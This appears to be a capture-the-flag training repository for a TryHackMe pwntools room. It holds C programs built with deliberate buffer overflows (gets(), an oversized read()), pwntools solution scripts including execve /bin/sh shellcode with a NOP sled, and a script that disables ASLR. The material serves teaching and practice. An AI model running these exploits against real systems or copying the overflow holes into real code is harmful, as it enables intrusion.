├── IntroToPwntools ├── cyclic │ ├── flag.txt │ ├── intro2pwn3 │ ├── alphabet │ └── test_cyclic.c ├── shellcraft │ ├── disable_aslr.sh │ ├── intro2pwnFinal │ ├── test_shellcraft.c │ └── note_to_buzz_2.txt ├── checksec │ ├── intro2pwn1 │ ├── intro2pwn2 │ └── test_checksec.c └── networking │ ├── serve_test │ ├── note_to_buzz.txt │ └── test_networking.c ├── pwn_cyclic.py ├── pwn_network.py ├── README.md └── pwn_shellcraft.py /IntroToPwntools/cyclic/flag.txt: -------------------------------------------------------------------------------- 1 | fake{not a real flag} 2 | -------------------------------------------------------------------------------- /IntroToPwntools/shellcraft/disable_aslr.sh: -------------------------------------------------------------------------------- 1 | echo 0 | tee /proc/sys/kernel/randomize_va_space 2 | -------------------------------------------------------------------------------- /IntroToPwntools/cyclic/intro2pwn3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dizmascyberlabs/IntroToPwntools/HEAD/IntroToPwntools/cyclic/intro2pwn3 -------------------------------------------------------------------------------- /IntroToPwntools/checksec/intro2pwn1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dizmascyberlabs/IntroToPwntools/HEAD/IntroToPwntools/checksec/intro2pwn1 -------------------------------------------------------------------------------- /IntroToPwntools/checksec/intro2pwn2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dizmascyberlabs/IntroToPwntools/HEAD/IntroToPwntools/checksec/intro2pwn2 -------------------------------------------------------------------------------- /IntroToPwntools/cyclic/alphabet: -------------------------------------------------------------------------------- 1 | AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ 2 | -------------------------------------------------------------------------------- /IntroToPwntools/networking/serve_test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dizmascyberlabs/IntroToPwntools/HEAD/IntroToPwntools/networking/serve_test -------------------------------------------------------------------------------- /IntroToPwntools/shellcraft/intro2pwnFinal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dizmascyberlabs/IntroToPwntools/HEAD/IntroToPwntools/shellcraft/intro2pwnFinal -------------------------------------------------------------------------------- /pwn_cyclic.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | padding = cyclic(cyclic_find('jaaa')) 4 | eip = p32(0x8048536) 5 | 6 | payload = padding + eip 7 | 8 | print(payload) 9 | -------------------------------------------------------------------------------- /IntroToPwntools/checksec/test_checksec.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(){ 4 | char name[12]; 5 | printf("Please input your name: "); 6 | gets(name); 7 | printf("Hello %s!\n", name); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /pwn_network.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | connect = remote('127.0.0.1', 1337) 5 | 6 | print(connect.recvn(18)) 7 | payload = "A"*32 8 | payload += p32(0xdeadbeef) 9 | connect.send(payload) 10 | print(connect.recvn(34)) 11 | -------------------------------------------------------------------------------- /IntroToPwntools/networking/note_to_buzz.txt: -------------------------------------------------------------------------------- 1 | Dear buzz, 2 | 3 | I'm running a service on port 1337, which has an overflow vulnerability. 4 | I've left you a version that will run on port 1336 so that you can develop 5 | your exploit. 6 | 7 | Sincerely, 8 | dizmas 9 | -------------------------------------------------------------------------------- /IntroToPwntools/shellcraft/test_shellcraft.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | void start(){ 7 | char input[64]; 8 | gets(input); 9 | } 10 | 11 | 12 | int main(){ 13 | printf("Hello There. Do you have an input for me?\n"); 14 | start(); 15 | 16 | } 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IntroToPwntools 2 | For my Try Hack Me room: Intro To Pwntools 3 | 4 | 5 | Hello y'all! 6 | 7 | Welcome to my github repo for Intro to Pwntools. Here you will find the challenges that I have written for the room, as well as solutions. 8 | 9 | I hope you enjoy! 10 | 11 | Sincerely, 12 | DiZma$ 13 | -------------------------------------------------------------------------------- /IntroToPwntools/shellcraft/note_to_buzz_2.txt: -------------------------------------------------------------------------------- 1 | Dear buzz, 2 | 3 | For this last pwntools challenge, you will need to disable ASLR. 4 | I have provided a script for you to do so, which you can run as 5 | sudo without a password. Just run: 6 | 7 | sudo ./disable_aslr.sh 8 | 9 | 10 | Good luck! 11 | 12 | Sincerely, 13 | dizmas 14 | -------------------------------------------------------------------------------- /pwn_shellcraft.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | proc = process('./intro2pwnFinal') 4 | proc.recvline() 5 | 6 | padding = cyclic(cyclic_find('taaa')) 7 | eip = p32(0xffffd4e0+200) 8 | nop_sled = "\x90"*1000 9 | 10 | execu = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80" 11 | 12 | payload = padding + eip + nop_sled + execu 13 | #print(payload) 14 | proc.send(payload) 15 | proc.interactive() 16 | 17 | -------------------------------------------------------------------------------- /IntroToPwntools/cyclic/test_cyclic.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void print_flag() { 6 | printf("Getting Flag:\n"); 7 | fflush(stdout); 8 | char *cat_flag[3] = {"/bin/cat", "flag.txt", NULL}; 9 | execve("/bin/cat", cat_flag, NULL); 10 | exit(0); 11 | } 12 | 13 | void start(){ 14 | char name[24]; 15 | gets(name); 16 | } 17 | 18 | 19 | int main(){ 20 | printf("I run as dizmas.\n"); 21 | printf("Who are you?: "); 22 | start(); 23 | 24 | } 25 | -------------------------------------------------------------------------------- /IntroToPwntools/networking/test_networking.c: -------------------------------------------------------------------------------- 1 | //Networking C code from: 2 | // https://www.geeksforgeeks.org/tcp-server-client-implementation-in-c/ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #define MAX 32 12 | #define PORT 1336 13 | #define SA struct sockaddr 14 | 15 | // function which handles input and output over the socket 16 | void target_function(int sockfd) 17 | { 18 | struct { 19 | char buff[MAX]; 20 | volatile int printflag; 21 | } targets; 22 | 23 | 24 | for (;;) { 25 | bzero(targets.buff, MAX); 26 | 27 | write(sockfd, "Give me deadbeef: ", 18); 28 | 29 | targets.printflag = 0; 30 | read(sockfd, targets.buff, 100); 31 | 32 | printf("From client: %s\t ", targets.buff); 33 | bzero(targets.buff, MAX); 34 | 35 | 36 | if (targets.printflag == 0xdeadbeef) { 37 | write(sockfd, "Thank you!\nflag{*****************}", 34); 38 | break; 39 | } 40 | else if (targets.printflag != 0) { 41 | write(sockfd, "Buffer Overflow, but not with 0xdeadbeef", 40); 42 | break; 43 | } 44 | } 45 | } 46 | 47 | 48 | int main() 49 | { 50 | int sockfd, connfd, len; 51 | struct sockaddr_in servaddr, cli; 52 | 53 | 54 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 55 | if (sockfd == -1) { 56 | printf("socket creation failed...\n"); 57 | exit(0); 58 | } 59 | else 60 | printf("Socket successfully created..\n"); 61 | bzero(&servaddr, sizeof(servaddr)); 62 | 63 | // assign IP, PORT 64 | servaddr.sin_family = AF_INET; 65 | servaddr.sin_addr.s_addr = htonl(INADDR_ANY); 66 | servaddr.sin_port = htons(PORT); 67 | 68 | // Binding newly created socket to given IP and verification 69 | if ((bind(sockfd, (SA*)&servaddr, sizeof(servaddr))) != 0) { 70 | printf("socket bind failed...\n"); 71 | exit(0); 72 | } 73 | else 74 | printf("Socket successfully binded..\n"); 75 | 76 | // Now server is ready to listen and verification 77 | if ((listen(sockfd, 5)) != 0) { 78 | printf("Listen failed...\n"); 79 | exit(0); 80 | } 81 | else 82 | printf("Server listening..\n"); 83 | len = sizeof(cli); 84 | 85 | // Accept the data packet from client and verification 86 | connfd = accept(sockfd, (SA*)&cli, &len); 87 | if (connfd < 0) { 88 | printf("server acccept failed...\n"); 89 | exit(0); 90 | } 91 | else 92 | printf("server acccept the client...\n"); 93 | 94 | // target function handles input and output 95 | target_function(connfd); 96 | 97 | // After chatting close the socket 98 | close(sockfd); 99 | } 100 | --------------------------------------------------------------------------------